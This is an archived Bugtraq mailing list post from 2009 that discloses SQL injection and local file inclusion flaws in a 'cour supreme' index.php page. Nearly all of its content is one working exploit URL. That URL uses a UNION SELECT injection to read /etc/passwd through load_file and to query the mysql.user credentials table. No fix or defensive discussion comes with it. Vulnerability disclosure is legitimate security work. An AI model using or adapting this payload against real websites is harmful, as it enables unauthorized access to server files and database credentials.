[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200909230413.n8N4DafD004640@www3.securityfocus.com>
Date: Tue, 22 Sep 2009 22:13:36 -0600
From: CrAzY_CrAcKeR@...mail.com
To: bugtraq@...urityfocus.com
Subject: cour supreme 'index.php' SQL Injection & Local File Include
Vulnerability
=================================================
Discovered By: CrAzY CrAcKeR
Email: CrAzY_CrAcKeR(at)hotmail(dot)com
================================================
example:-
http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user
================================================
Powered by blists - more mailing lists